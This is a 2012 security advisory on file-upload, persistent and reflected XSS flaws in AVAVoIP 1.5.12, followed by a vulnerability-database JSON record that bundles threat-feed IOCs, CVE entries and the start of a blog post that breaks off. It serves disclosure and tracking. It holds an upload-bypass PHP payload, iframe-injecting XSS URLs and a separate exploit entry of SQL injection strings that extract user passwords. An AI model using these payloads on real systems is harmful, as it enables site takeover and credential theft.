Designed from the ground up to empower VoIP and to meet the needs of the changing business environment, the
AVA VoIP platform provides best in class features and carrier performance at competitive cost so you can spend
more time on strategic initiatives and less time on technical issues and downtime. Powerful CDR Mediation,
Pricing, Rating, Billing, Reporting and Routing engines enable providers to meet the challenges they face every day.
The AVA VoIP package supports all the traditional telecom business models such as: prepaid and postpaid wholesale VoIP,
prepaid and postpaid retail VoIP, calling cards, callback, call shop, Internet cafe, hotels, etc. In addition our team
of experienced engineers can address and custom tailor updates or platform add-ons as requested by our clients. Avangard
Solutions, Inc. provides cost-effective, customized IT solutions to large and mid-sized organizations worldwide. With
experience in the latest, state of the art technology trends, our expertise spans a wide variety of subject matters in
the areas of Pricing and Rating, Billing, BSS, OSS, CRM, ERP, SRM and e-commerce solutions. We offer our strategic
expertise backed with years of experience in communications protocols, VoIP, Triple Play and converged solutions.
(Copy of the Vendor Homepage: http://avavoip.com/ )
Abstract:
The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in AVAVoIP Communication Application 1.5.12.
Report-Timeline:
2012-06-09: Public or Non-Public Disclosure
Status:
Published
Exploitation-Technique:
Remote
Severity:
High
Details:
1.1
An arbitrary File Upload Vulnerability is detected in AVAs AVAVoIP Communication Application v1.5.12.
An attacker can upload a php file to the website and access this php file to control the entire site.
The vulnerability can only be exploited with privileged application user account. The bug is located
in the FX rates > upload FX rates application function in the fx_rates_upload.php file.
Vulnerable Section(s):
[+] FX rates > upload FX rates
Vulnerable File(s):
[+] fx_rates_upload.php
1.2
Multiple persistent input validation vulnerabilities are detected in AVAs AVAVoIP Communication Application v1.5.12.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent)
context manipulation. Exploitation requires low user inter action & privileged user account. The persistent
vulnerabilities are located in multiple different files and also the bound parameters & affected output listings.
Vulnerable File(s):
[+] accountadd.php First Name
[+] agent_set.php
[+] batchadd.php
[+] carrier_list.php
[+] routeset_set.php
[+] tariff_add.php
[+] taxadd.php
Vulnerable Module(s):
[+] Accounts > Add > First Name
[+] Agents > Add Agents > Business Phone
[+] Rating & Billing > Update Batch > Batch Name
[+] Rating & Billing > Taxes & Localities > Taxes > Tax Name
[+] Routing > Carrers > Carrier ID > Add & Listing
[+] Routing > Route Sets > Add & Update > Route Set Name
[+] Routing > Tariffs > Update Name
1.3
Multiple non persistent cross site scripting vulnerabilities are detected in AVAs AVAVoIP Communication Application v1.5.12.
The vulnerability allows remote attackers to hijack website customer, moderator & admin sessions with medium/high required
user inter action or local low privileged user account. Successful exploitation result in account steal, phishing &
client-side context request manipulation.
1.1
The local file include vulnerability can be exploited by privileged user accounts without required user inter action.
For demonstration or reproduce ...
The attacker can go to the vulnerable file which is located at FX rates > upload FX rates. The upload function in
the vulnerable page (fx_rates_upload.php) doesn't check the extension of the uploaded file. However, it checks the
format of the file via own flag. Therefore if the attacker uploaded a php file like this
<?
echo "test";
<?
The Attacker will get an error because it is not satisfying the format of how the uploaded file should be, but if the
attacker uploaded the following file ...
The file will be successfully uploaded. The attacker bypassed the check of the format of the uploaded file function and
get a working php file because the data that we added are commented out.
1.2
The persistent script code injection vulnerabilities can be exploited by privileged user accounts with low required user
inter action. For demonstration or reproduce ...
1.3
The client side cross site scripting vulnerabilities can be exploited by remote attacker with medium or high required
user inter action. For demonstration or reproduce ...
1.1
The security risk of the local file upload vulnerability is estimated as medium(+).
1.2
The security risk of the persistent input validation vulnerabilities are estimated as medium(+).
1.3
The security risk of the client side cross site scripting vulnerabilities are estimated as low(+).
Credits:
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed [the StOrM) (storm@vulnerability-lab.com)
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
Disclaimer:
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
--
VULNERABILITY LABORATORY - RESEARCH TEAM
COMPANY: www.vulnerability-lab.com or www.vuln-lab.com
ADMIN MAIL: admin@vulnerability-lab.com
PHONE: 01776757259
{"id": "SECURITYVULNS:DOC:28323", "bulletinFamily": "software", "title": "AVAVoIP v1.5.12 - Multiple Web Vulnerabilities", "description": "Title:\r\n======\r\nAVAVoIP v1.5.12 - Multiple Web Vulnerabilities\r\n\r\n\r\nDate:\r\n=====\r\n2012-06-28\r\n\r\n\r\nReferences:\r\n===========\r\nhttp://www.vulnerability-lab.com/get_content.php?id=437\r\n\r\n\r\nVL-ID:\r\n=====\r\n611\r\n\r\n\r\nCommon Vulnerability Scoring System:\r\n====================================\r\n6.5\r\n\r\n\r\nIntroduction:\r\n=============\r\nDesigned from the ground up to empower VoIP and to meet the needs of the changing business environment, the \r\nAVA VoIP platform provides best in class features and carrier performance at competitive cost so you can spend \r\nmore time on strategic initiatives and less time on technical issues and downtime. Powerful CDR Mediation, \r\nPricing, Rating, Billing, Reporting and Routing engines enable providers to meet the challenges they face every day.\r\nThe AVA VoIP package supports all the traditional telecom business models such as: prepaid and postpaid wholesale VoIP, \r\nprepaid and postpaid retail VoIP, calling cards, callback, call shop, Internet cafe, hotels, etc. In addition our team \r\nof experienced engineers can address and custom tailor updates or platform add-ons as requested by our clients. Avangard \r\nSolutions, Inc. provides cost-effective, customized IT solutions to large and mid-sized organizations worldwide. With \r\nexperience in the latest, state of the art technology trends, our expertise spans a wide variety of subject matters in \r\nthe areas of Pricing and Rating, Billing, BSS, OSS, CRM, ERP, SRM and e-commerce solutions. We offer our strategic \r\nexpertise backed with years of experience in communications protocols, VoIP, Triple Play and converged solutions.\r\n\r\n(Copy of the Vendor Homepage: http://avavoip.com/ )\r\n\r\n\r\nAbstract:\r\n=========\r\nThe Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in AVAVoIP Communication Application 1.5.12.\r\n\r\n\r\nReport-Timeline:\r\n================\r\n2012-06-09: Public or Non-Public Disclosure\r\n\r\n\r\nStatus:\r\n========\r\nPublished\r\n\r\n\r\nExploitation-Technique:\r\n=======================\r\nRemote\r\n\r\n\r\nSeverity:\r\n=========\r\nHigh\r\n\r\n\r\nDetails:\r\n========\r\n1.1\r\nAn arbitrary File Upload Vulnerability is detected in AVAs AVAVoIP Communication Application v1.5.12.\r\nAn attacker can upload a php file to the website and access this php file to control the entire site.\r\nThe vulnerability can only be exploited with privileged application user account. The bug is located \r\nin the FX rates > upload FX rates application function in the fx_rates_upload.php file.\r\n\r\nVulnerable Section(s):\r\n [+] FX rates > upload FX rates\r\n\r\nVulnerable File(s):\r\n [+] fx_rates_upload.php\r\n\r\n\r\n\r\n1.2\r\nMultiple persistent input validation vulnerabilities are detected in AVAs AVAVoIP Communication Application v1.5.12.\r\nThe bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). \r\nSuccessful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) \r\ncontext manipulation. Exploitation requires low user inter action & privileged user account. The persistent \r\nvulnerabilities are located in multiple different files and also the bound parameters & affected output listings.\r\n\r\nVulnerable File(s):\r\n [+] accountadd.php First Name\r\n [+] agent_set.php\r\n [+] batchadd.php\r\n [+] carrier_list.php\r\n [+] routeset_set.php\r\n [+] tariff_add.php\r\n [+] taxadd.php\r\n\r\n\r\nVulnerable Module(s):\r\n [+] Accounts > Add > First Name\r\n [+] Agents > Add Agents > Business Phone\r\n [+] Rating & Billing > Update Batch > Batch Name\r\n [+] Rating & Billing > Taxes & Localities > Taxes > Tax Name\r\n [+] Routing > Carrers > Carrier ID > Add & Listing\r\n [+] Routing > Route Sets > Add & Update > Route Set Name\r\n [+] Routing > Tariffs > Update Name\r\n\r\n\r\nVulnerable Parameter(s):\r\n [+] mtext, firstname & text\r\n [+] agent_business_phone\r\n [+] batch_name\r\n [+] carrier_id\r\n [+] route_set_name\r\n [+] tariff_name\r\n [+] taxname\r\n\r\n\r\n\r\n1.3\r\nMultiple non persistent cross site scripting vulnerabilities are detected in AVAs AVAVoIP Communication Application v1.5.12.\r\nThe vulnerability allows remote attackers to hijack website customer, moderator & admin sessions with medium/high required \r\nuser inter action or local low privileged user account. Successful exploitation result in account steal, phishing & \r\nclient-side context request manipulation. \r\n\r\n\r\nVulnerable File(s):\r\n [+] agent_accounts_report.php\r\n [+] tariff_add.php\r\n [+] routeset_set.php\r\n\r\n\r\nVulnerable Parameter(s):\r\n [+] routeset_id\r\n [+] tariff_id\r\n [+] agent_id\r\n\r\n\r\nProof of Concept:\r\n=================\r\n1.1\r\nThe local file include vulnerability can be exploited by privileged user accounts without required user inter action.\r\nFor demonstration or reproduce ...\r\n\r\nThe attacker can go to the vulnerable file which is located at FX rates > upload FX rates. The upload function in \r\nthe vulnerable page (fx_rates_upload.php) doesn't check the extension of the uploaded file. However, it checks the \r\nformat of the file via own flag. Therefore if the attacker uploaded a php file like this\r\n\r\n<?\r\necho "test";\r\n<?\r\nThe Attacker will get an error because it is not satisfying the format of how the uploaded file should be, but if the \r\nattacker uploaded the following file ...\r\n\r\n<? //ZIMBABWE,BWP,7.7160\r\necho "test"; //ZIMBABWE,BWP,7.7160\r\n?> //ZIMBABWE,BWP,7.7160\r\n\r\nThe file will be successfully uploaded. The attacker bypassed the check of the format of the uploaded file function and \r\nget a working php file because the data that we added are commented out.\r\n\r\n\r\n1.2\r\nThe persistent script code injection vulnerabilities can be exploited by privileged user accounts with low required user\r\ninter action. For demonstration or reproduce ...\r\n\r\n\r\nReview: Accounts > Add > First Name\r\n\r\n<tr>\r\n<td class="mtext" width="200">First Name <span class="mandatory_field">*</span></td>\r\n<td class="mtext"><input maxlength="255" type="text"><[PERSISTENT SCRIPT CODE INJECTION])' \r\n<"="" class="loginfileld" size="20" name="first_name"></td>\r\n\r\n\r\nReview: Agents > Add Agents > Business Phone\r\n\r\n<tr> \r\n<td class="mtext" width="200">Business Phone</td>\r\n<td class="mtext">\r\n<input name="agent_business_phone" type="text"><iframe src="agent_set.php-Dateien/[PERSISTENT SCRIPT CODE INJECTION]")' \r\n<"="" class="loginfileld">\r\n</td>\r\n</tr>\r\n\r\n\r\n\r\nReview: Rating & Billing > Update Batch > Batch Name\r\n\r\n<tr>\r\n<td class="mtext" width="200">Batch Name <span class="mandatory_field">*</span></td>\r\n<td class="mtext"><input maxlength="50" size="20" type="text"><iframe src="batchadd.php-Dateien/[PERSISTENT SCRIPT CODE INJECTION]"' \r\nname="batch_name" class="loginfileld"></td>\r\n</tr>\r\n<tr>\r\n\r\n\r\nReview: Rating & Billing > Taxes & Localities > Taxes > Tax Name\r\n\r\n<tr>\r\n<td class="mtext" width="200">Tax Name <span class="mandatory_field">*</span></td>\r\n<td class="mtext">\r\n<input maxlength="255" class="loginfileld" size="20" type="text"><iframe src="taxadd.php-Dateien/[PERSISTENT SCRIPT CODE INJECTION])' \r\n<"="" name="taxname">\r\n\r\n\r\n\r\nReview: Routing > Carrers > Carrier ID > Add & Listing\r\n\r\n<tr><td>\r\n<div style="width: 180px; float: left; margin: 5px 7px 0pt 5px;">\r\n<span style="width: 80px; float: left; font-family: Tahoma,Verdana,Helvetica;">Carrier ID </span>\r\n<span style="width: 100px; float: left; font-family: Tahoma,Verdana,Helvetica;"><input name="carrier_id" type="text">\r\n<iframe src="carrier_list.php-Dateien/[PERSISTENT SCRIPT CODE INJECTION])' <"="" onkeypress="checkEnter(event)" class="loginfileld" \r\nstyle="width: 100px;"></span>\r\n</div>\r\n\r\n\r\n\r\nReview: Routing > Route Sets > Add & Update > Route Set Name\r\n\r\n<tr>\r\n<td class="mtext" width="200">Route Set Name <span class="mandatory_field">*</span></td>\r\n<td class="mtext"><input name="route_set_name" type="text"><iframe src="routeset_set.php-Dateien/[PERSISTENT SCRIPT CODE INJECTION])' <"="" class="loginfileld"></td>\r\n\r\n\r\nReview: Routing > Tariffs > Update Name\r\n\r\n<!--/NOTACTIVE-->\r\n<!--ACTIVE--><a>Update "><iframe src="tariff_add.php-Dateien/[PERSISTENT SCRIPT CODE INJECTION])' <<="" a=""><!--/ACTIVE-->\r\n</div>\r\n<!--\r\n Login / Logout section ends -->\r\n\r\n\r\n\r\n1.3\r\nThe client side cross site scripting vulnerabilities can be exploited by remote attacker with medium or high required \r\nuser inter action. For demonstration or reproduce ...\r\n\r\nhttp://avavoip.127.0.0.1:8080/agent_accounts_report.php?agent_id=%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://avavoip.127.0.0.1:8080/tariff_add.php?tariff_id=%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://avavoip.127.0.0.1:8080/routeset_set.php?routeset_id=%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C\r\n\r\n\r\nRisk:\r\n=====\r\n1.1\r\nThe security risk of the local file upload vulnerability is estimated as medium(+).\r\n\r\n1.2\r\nThe security risk of the persistent input validation vulnerabilities are estimated as medium(+).\r\n\r\n1.3\r\nThe security risk of the client side cross site scripting vulnerabilities are estimated as low(+).\r\n\r\n\r\nCredits:\r\n========\r\nVulnerability Laboratory [Research Team] - Ibrahim El-Sayed [the StOrM) (storm@vulnerability-lab.com)\r\nVulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)\r\n\r\n\r\nDisclaimer:\r\n===========\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, \r\neither expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-\r\nLab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business \r\nprofits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some \r\nstates do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation \r\nmay not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases \r\nor trade with fraud/stolen material.\r\n\r\nDomains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register\r\nContact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com\r\nSection: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com\r\nSocial: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab\r\nFeeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. \r\nPermission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other \r\nmedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and \r\nother information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), \r\nmodify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.\r\n\r\n Copyright \u00a9 2012 | Vulnerability Laboratory\r\n\r\n\r\n\r\n\r\n-- \r\nVULNERABILITY LABORATORY - RESEARCH TEAM\r\nCOMPANY: www.vulnerability-lab.com or www.vuln-lab.com\r\nADMIN MAIL: admin@vulnerability-lab.com\r\nPHONE: 01776757259\r\n\r\n", "published": "2012-07-23T00:00:00", "modified": "2012-07-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28323", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:45", "edition": 1, "viewCount": 32, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2018-08-31T11:10:45", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-7273", "CVE-2014-2595", "CVE-2015-9286", "CVE-2008-7272"]}, {"type": "zdt", "idList": ["1337DAY-ID-28323"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:30FF57A1D82576B03F12B5F844672FC0"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32652", "SECURITYVULNS:DOC:32659", "SECURITYVULNS:DOC:32654", "SECURITYVULNS:DOC:32653", "SECURITYVULNS:VULN:14755", "SECURITYVULNS:VULN:14753", "SECURITYVULNS:DOC:32651", "SECURITYVULNS:VULN:14720", "SECURITYVULNS:DOC:32660", "SECURITYVULNS:DOC:32658"]}], "modified": "2018-08-31T11:10:45", "rev": 2}, "vulnersScore": 6.1}, "affectedSoftware": []}
{"rst": [{"lastseen": "2020-12-13T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **189[.]50.11.2** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **5**.\n First seen: 2020-04-06T03:00:00, Last seen: 2020-12-13T03:00:00.\n IOC tags: **shellprobe**.\nASN 28323: (First IP 189.50.0.0, Last IP 189.50.15.255).\nASN Name \"VIPR\" and Organisation \"ede Telecomunicaes Ltda\".\nASN hosts 56 domains.\nGEO IP information: City \"Vitria\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-04-06T00:00:00", "id": "RST:AE544A1C-2D6F-32BB-A0D1-D3372CB91591", "href": "", "published": "2020-12-14T00:00:00", "title": "RST Threat feed. IOC: 189.50.11.2", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-06T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **189[.]50.13.198** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **51**.\n First seen: 2020-12-06T03:00:00, Last seen: 2020-12-06T03:00:00.\n IOC tags: **generic**.\nASN 28323: (First IP 189.50.0.0, Last IP 189.50.15.255).\nASN Name \"VIPR\" and Organisation \"ede Telecomunicaes Ltda\".\nASN hosts 56 domains.\nGEO IP information: City \"Serra\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-06T00:00:00", "id": "RST:714CD305-AD20-3F5C-B5BF-5B51F31A9356", "href": "", "published": "2020-12-06T00:00:00", "title": "RST Threat feed. IOC: 189.50.13.198", "type": "rst", "cvss": {}}, {"lastseen": "2020-08-12T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **189[.]50.15.202** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **21**.\n First seen: 2020-06-24T03:00:00, Last seen: 2020-08-12T03:00:00.\n IOC tags: **generic**.\nASN 28323: (First IP 189.50.0.0, Last IP 189.50.15.255).\nASN Name \"VIPR\" and Organisation \"ede Telecomunicaes Ltda\".\nASN hosts 46 domains.\nGEO IP information: City \"Vitria\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-06-24T00:00:00", "id": "RST:7A23AC73-60AE-3C22-A994-9965942DF2C3", "href": "", "published": "2020-09-21T00:00:00", "title": "RST Threat feed. IOC: 189.50.15.202", "type": "rst", "cvss": {}}], "cve": [{"lastseen": "2020-10-03T12:01:15", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:28", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T19:28:28", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:03:10", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "zdt": [{"lastseen": "2018-01-03T03:03:31", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2017-08-19T00:00:00", "type": "zdt", "title": "SOA School Management 3.0 - SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-08-19T00:00:00", "href": "https://0day.today/exploit/description/28323", "id": "1337DAY-ID-28323", "sourceData": "# # # # #\r\n# Exploit Title: SOA School Management 3.0 - SQL Injection\r\n# Dork: N/A\r\n# Date: 18.08.2017\r\n# Vendor Homepage : https://ynetinteractive.com/\r\n# Software Link: http://codecanyon.net/item/soa-school-management-software-with-integrated-parents-students-portal/20435367?s_rank=3\r\n# Demo: http://demo.ynetinteractive.com/soa/\r\n# Version: 3.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an attacker to inject sql commands....\r\n#\r\n# Proof of Concept:\r\n# http://localhost/[PATH]/drivers/jquery/usersession_exam.php?id=[SQL]\r\n# http://localhost/[PATH]/drivers/jquery/session_exam.php?id=[SQL]\r\n# 1'+/*!44444union*/+/*!44444select*/+1,2,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)[email\u00a0protected]:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),4,5--+-\r\n# 1'+/*!44444union*/+/*!44444select*/+1,2,concat(username,0x3a,password),4,5+from+users--+-\r\n# \r\n# http://localhost/[PATH]/Assignment.php?student_id=[SQL]\r\n# 7'and+(select+0x31+from (select+count(*),concat((select(select concat(cast(database() as char),0x7e))+from information_schema.tables+where table_schema=database()+limit 0,1),floor(rand(0)*2))x from+information_schema.tables+group+by+x)a)+AND ''='\r\n# \r\n# http://localhost/[PATH]/Fee.php?pay&student_id=7&fee_id=[SQL]\r\n# \r\n# http://localhost/[PATH]/YearBook.php?session_id=[SQL]\r\n# \r\n# http://localhost/[PATH]/Transaction.php?invoice=[SQL]\r\n# \r\n# Etc...\r\n# # # # #\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/28323", "cvss": {"score": 0.0, "vector": "NONE"}}], "trendmicroblog": [{"lastseen": "2017-05-26T18:49:50", "bulletinFamily": "blog", "cvelist": ["CVE-4782-4783", "CVE-4759-4761", "CVE-4792-4793", "CVE-4808-4809"], "description": "\n\nFor those of you who follow the National Football League (NFL), do you remember Super Bowl 47? I wasn\u2019t exactly thrilled about the teams that played since I\u2019m not a 49ers or Ravens fan. What was interesting about the game is that it was halted for over half an hour in the third quarter because of a power outage, earning that game the nickname of \u201cBlackout Bowl.\u201d Although it was eventually ruled a power surge issue, there were many, including me, that thought there could have been foul play involved.\n\nThere is always potential for a cyberattack against our electrical grid and public safety computer systems \u2013 especially during the biggest game of the year!\n\nWe have placed an emphasis on threat intelligence for our customers' supervisory control and data acquisition (SCADA) networks for over a decade. Earlier this week, the Zero Day Initiative (ZDI) presented a session on their extensive analysis of more than 250 security vulnerabilities in SCADA human machine interface (HMI) systems from 2015-2016 at the Positive Hack Days conference in Moscow. Their research efforts, which included vulnerabilities acquired through the ZDI bug bounty 